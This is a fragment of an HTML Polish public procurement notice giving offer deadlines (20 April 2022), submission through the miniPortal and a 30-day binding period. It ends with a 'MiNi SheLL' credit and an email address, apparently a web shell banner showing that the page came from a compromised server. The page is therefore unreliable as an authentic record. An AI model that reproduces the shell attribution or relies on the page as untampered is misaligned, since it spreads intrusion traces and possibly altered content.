opisane są w § 18 projektu umowy stanowiącym załącznik nr<br/>9 do niniejszej SWZ <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-04-20 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę w postępowaniu, za pośrednictwem „Formularza do złożenia, zmiany, wycofania oferty lub wniosku”dostępnego na miniPortalu. Funkcjonalność do zaszyfrowania oferty przez Wykonawcę jest dostępna dla wykonawców na miniPortalu, w szczegółach danego postępowania.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-04-20 10:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com